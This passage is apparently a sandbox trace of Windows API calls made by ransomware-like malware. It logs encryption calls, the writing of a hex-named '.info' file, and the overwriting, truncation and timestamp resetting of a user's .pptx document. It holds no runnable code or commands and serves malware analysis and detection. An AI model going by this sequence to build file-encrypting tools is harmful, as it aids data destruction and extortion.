pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2432498*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0072.513] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24324e8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x24324e8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0072.513] WriteFile (in: hFile=0x380, lpBuffer=0x2432538*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2432538*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0072.513] CloseHandle (hObject=0x380) returned 1 [0072.514] CloseHandle (hObject=0x36c) returned 1 [0072.514] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0072.514] CryptReleaseContext (hProv=0x1a5b7f10, dwFlags=0x0) returned 1 [0072.514] CryptReleaseContext (hProv=0x1a5b7f10, dwFlags=0x0) returned 1 [0072.514] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", lpFilePart=0x0) returned 0x48 [0072.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0072.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7da8fedb9e07bf9f876d8d74e3d9d3d9"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.514] GetFileType (hFile=0x36c) returned 0x1 [0072.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0072.514] GetFileType (hFile=0x36c) returned 0x1 [0072.515] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.516] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.517] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.518] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.519] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.519] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.519] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.519] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.519] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.519] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.520] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.521] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.521] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.521] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.521] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.521] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0xa0, lpOverlapped=0x0) returned 1 [0072.521] ReadFile (in: hFile=0x36c, lpBuffer=0x2433c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2433c30*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0072.521] CloseHandle (hObject=0x36c) returned 1 [0072.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9.info", lpFilePart=0x0) returned 0x4d [0072.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0072.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7da8fedb9e07bf9f876d8d74e3d9d3d9.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.524] GetFileType (hFile=0x36c) returned 0x1 [0072.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0072.554] GetFileType (hFile=0x36c) returned 0x1 [0072.554] WriteFile (in: hFile=0x36c, lpBuffer=0x24402e0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x24402e0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0072.555] CloseHandle (hObject=0x36c) returned 1 [0072.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0072.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86176c90, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0x83baa290, ftLastAccessTime.dwHighDateTime=0x1d51b83, ftLastWriteTime.dwLowDateTime=0x83baa290, ftLastWriteTime.dwHighDateTime=0x1d51b83, nFileSizeHigh=0x0, nFileSizeLow=0x17090)) returned 1 [0072.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0072.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.557] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", dwFileAttributes=0x80) returned 1 [0072.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0072.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2447ee8 | out: lpFileInformation=0x2447ee8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x86176c90, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0x83baa290, ftLastAccessTime.dwHighDateTime=0x1d51b83, ftLastWriteTime.dwLowDateTime=0x83baa290, ftLastWriteTime.dwHighDateTime=0x1d51b83, nFileSizeHigh=0x0, nFileSizeLow=0x17090)) returned 1 [0072.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0072.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0072.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.558] GetFileType (hFile=0x36c) returned 0x1 [0072.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0072.558] GetFileType (hFile=0x36c) returned 0x1 [0072.558] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.558] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.559] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.560] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.561] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.561] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.562] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.563] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.564] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.564] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.565] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.566] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.567] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.567] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.568] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.569] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.569] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.570] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.571] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.572] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.573] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.574] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.574] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.575] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.575] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0072.575] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.576] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.577] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.577] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.578] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.579] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.580] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.580] WriteFile (in: hFile=0x36c, lpBuffer=0x24483b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24483b0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.582] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.583] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.583] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.583] SetEndOfFile (hFile=0x36c) returned 1 [0072.585] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.585] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.586] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0072.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 